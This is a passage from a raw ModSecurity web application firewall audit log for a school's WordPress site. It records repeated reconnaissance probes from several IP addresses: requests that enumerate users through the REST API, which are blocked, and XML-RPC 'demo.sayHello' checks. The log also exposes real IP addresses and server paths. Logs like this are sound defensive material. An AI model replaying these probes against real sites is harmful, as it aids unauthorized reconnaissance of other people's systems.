2) Stopwatch: 1746461311448882 3209 (- - -) Stopwatch2: 1746461311448882 3209; combined=1439, p1=496, p2=911, p3=0, p4=0, p5=31, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59639b03-Z-- --c32d475e-A-- [05/May/2025:23:08:34 +0700] aBjiggRwKNFSM6B7_LagagAAAIo 103.236.140.4 46810 103.236.140.4 8181 --c32d475e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c32d475e-C-- demo.sayHello --c32d475e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c32d475e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461314518636 5480 (- - -) Stopwatch2: 1746461314518636 5480; combined=4203, p1=506, p2=3473, p3=33, p4=33, p5=94, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c32d475e-Z-- --5e95f55b-A-- [05/May/2025:23:08:35 +0700] aBjigwRwKNFSM6B7_LagawAAAJA 103.236.140.4 46816 103.236.140.4 8181 --5e95f55b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5e95f55b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e95f55b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461315179012 2616 (- - -) Stopwatch2: 1746461315179012 2616; combined=1218, p1=492, p2=700, p3=0, p4=0, p5=25, sr=182, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e95f55b-Z-- --76746432-A-- [05/May/2025:23:08:38 +0700] aBjihk2V_h1VFAgsfgZ9QwAAAAI 103.236.140.4 46850 103.236.140.4 8181 --76746432-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --76746432-C-- demo.sayHello --76746432-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --76746432-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461318347401 6115 (- - -) Stopwatch2: 1746461318347401 6115; combined=4989, p1=563, p2=4186, p3=39, p4=43, p5=95, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76746432-Z-- --ef83f87f-A-- [05/May/2025:23:09:06 +0700] aBjiovZJDMuQndL03JNc-QAAAEY 103.236.140.4 47094 103.236.140.4 8181 --ef83f87f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ef83f87f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef83f87f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461346508568 2571 (- - -) Stopwatch2: 1746461346508568 2571; combined=1269, p1=400, p2=840, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef83f87f-Z-- --e1f1fb32-A-- [05/May/2025:23:09:09 +0700] aBjipYZWvR7-42f6JrANFAAAAM0 103.236.140.4 47126 103.236.140.4 8181 --e1f1fb32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e1f1fb32-C-- demo.sayHello --e1f1fb32-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1f1fb32-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461349272267 5346 (- - -) Stopwatch2: 1746461349272267 5346; combined=4382, p1=529, p2=3502, p3=32, p4=34, p5=157, sr=71, sw=128, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1f1fb32-Z-- --1e37dd26-A-- [05/May/2025:23:09:18 +0700] aBjiroZWvR7-42f6JrANIQAAAMM 103.236.140.4 47204 103.236.140.4 8181 --1e37dd26-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.119.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.119.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1e37dd26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e37dd26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461358076546 2341 (- - -) Stopwatch2: 1746461358076546 2341; combined=1093, p1=371, p2=696, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e37dd26-Z-- --aa4f382f-A-- [05/May/2025:23:09:20 +0700] aBjisPZJDMuQndL03JNdCgAAAFU 103.236.140.4 47248 103.236.140.4 8181 --aa4f382f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.119.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.119.20 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aa4f382f-C-- demo.sayHello --aa4f382f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa4f382f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461360861007 5298 (- - -) Stopwatch2: 1746461360861007 5298; combined=4076, p1=524, p2=3348, p3=35, p4=39, p5=78, sr=78, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa4f382f-Z-- --a5b1303b-A-- [05/May/2025:23:09:30 +0700] aBjiugRwKNFSM6B7_LagjAAAAIc 103.236.140.4 47360 103.236.140.4 8181 --a5b1303b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a5b1303b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5b1303b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461370043510 3030 (- - -) Stopwatch2: 1746461370043510 3030; combined=1536, p1=507, p2=999, p3=0, p4=0, p5=30, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5b1303b-Z-- --61b79643-A-- [05/May/2025:23:09:33 +0700] aBjivYZWvR7-42f6JrANLwAAAMI 103.236.140.4 47396 103.236.140.4 8181 --61b79643-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.22 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --61b79643-C-- demo.sayHello --61b79643-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --61b79643-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461373401711 5610 (- - -) Stopwatch2: 1746461373401711 5610; combined=4631, p1=602, p2=3784, p3=44, p4=45, p5=93, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61b79643-Z-- --a2e2ae11-A-- [05/May/2025:23:09:41 +0700] aBjixQRwKNFSM6B7_LagkQAAAI8 103.236.140.4 47468 103.236.140.4 8181 --a2e2ae11-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a2e2ae11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2e2ae11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461381158869 3005 (- - -) Stopwatch2: 1746461381158869 3005; combined=1322, p1=426, p2=868, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2e2ae11-Z-- --c67ef75b-A-- [05/May/2025:23:09:44 +0700] aBjiyPZJDMuQndL03JNdIAAAAE8 103.236.140.4 47496 103.236.140.4 8181 --c67ef75b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.235 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c67ef75b-C-- demo.sayHello --c67ef75b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c67ef75b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461384137472 5532 (- - -) Stopwatch2: 1746461384137472 5532; combined=4090, p1=517, p2=3350, p3=32, p4=35, p5=93, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c67ef75b-Z-- --b5e29523-A-- [05/May/2025:23:09:58 +0700] aBji1vZJDMuQndL03JNdKgAAAFQ 103.236.140.4 47624 103.236.140.4 8181 --b5e29523-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b5e29523-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5e29523-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461398420394 2790 (- - -) Stopwatch2: 1746461398420394 2790; combined=1260, p1=405, p2=826, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5e29523-Z-- --e40ba15a-A-- [05/May/2025:23:10:01 +0700] aBji2QRwKNFSM6B7_LagogAAAIQ 103.236.140.4 47660 103.236.140.4 8181 --e40ba15a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.19 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e40ba15a-C-- demo.sayHello --e40ba15a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e40ba15a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461401370521 4536 (- - -) Stopwatch2: 1746461401370521 4536; combined=3281, p1=423, p2=2675, p3=28, p4=30, p5=74, sr=60, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e40ba15a-Z-- --3ec77a2c-A-- [05/May/2025:23:10:11 +0700] aBji4wRwKNFSM6B7_LagsQAAAJY 103.236.140.4 47758 103.236.140.4 8181 --3ec77a2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3ec77a2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ec77a2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461411275406 2887 (- - -) Stopwatch2: 1746461411275406 2887; combined=1413, p1=472, p2=909, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ec77a2c-Z-- --e3fe8775-A-- [05/May/2025:23:10:14 +0700] aBji5oZWvR7-42f6JrANRwAAANM 103.236.140.4 47782 103.236.140.4 8181 --e3fe8775-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e3fe8775-C-- demo.sayHello --e3fe8775-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3fe8775-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461414164516 5072 (- - -) Stopwatch2: 1746461414164516 5072; combined=4180, p1=493, p2=3355, p3=31, p4=34, p5=148, sr=72, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3fe8775-Z-- --0e62b45b-A-- [05/May/2025:23:10:15 +0700] aBji54ZWvR7-42f6JrANSgAAANc 103.236.140.4 47792 103.236.140.4 8181 --0e62b45b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0e62b45b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e62b45b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461415302225 15770 (- - -) Stopwatch2: 1746461415302225 15770; combined=26303, p1=481, p2=783, p3=0, p4=0, p5=12539, sr=133, sw=0, l=0, gc=12500 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e62b45b-Z-- --b02c6758-A-- [05/May/2025:23:10:19 +0700] aBji602V_h1VFAgsfgZ9dwAAAAQ 103.236.140.4 47826 103.236.140.4 8181 --b02c6758-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.244 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b02c6758-C-- demo.sayHello --b02c6758-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b02c6758-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id 